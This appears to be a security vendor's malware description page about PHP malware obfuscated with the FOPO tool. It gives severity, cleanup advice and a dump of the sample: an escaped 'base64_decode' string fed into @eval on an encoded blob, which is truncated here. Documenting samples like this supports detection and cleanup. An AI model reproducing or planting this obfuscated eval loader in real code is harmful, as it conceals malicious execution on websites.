PRICING SUPPORT LOGIN

PHP malware is one of the most commom malicious code found on the internet, mostly because it is the leading server-side language used on websites, followed by ASP, Java, ColdFusion and Perl (source). In order to address this issue, our tools are capable of detecting and cleaning up malware that weren't collected yet, but meet a complex set of characteristics that are considered malicious.
This malware uses free online obfuscator (FOPO - Free Online PHP Obfuscator) usually chosen by malware coders, however, there are cases where addon developers (Magento, usually) use this tool for they code as well, so be careful during cleanup.

Severity

MEDIUM

Affecting

This malicious code affects any vulnerable or compromised website that is configured to interpret the script language.

Cleanup

Inspect your site's files, specially theme related, to find for code you don't recognize. Look for any encoded or obfuscated PHP code.
Also, you can sign up with us and let our team remove the malware for you.

Dump

<?php
/*
Obfuscation provided by FOPO - Free Online PHP Obfuscator: http://www.fopo.com.ar/
This code was created on Tuesday, February 11th, 2014 at 20:09 UTC from IP 197.204.47.26 (dz)
Checksum: 4e25bee3583dfb008c6f28131c05c850d7d2070e
*/
$c9e9ffbc="\142\x61\x73\x65\x36\64\137\144\145\x63\x6f\x64\145";@eval($c9e9ffbc(
"Ly9OSU5mZTlBZkx0bC9IZUZVZGM3OXJnL0RZbjRVaklHU1YxMWg4TVdpSXZyMWlMenRtaGlzTmVVMGh
RZzlhWVpoVm0rMW5oNFFuaDc0bkZj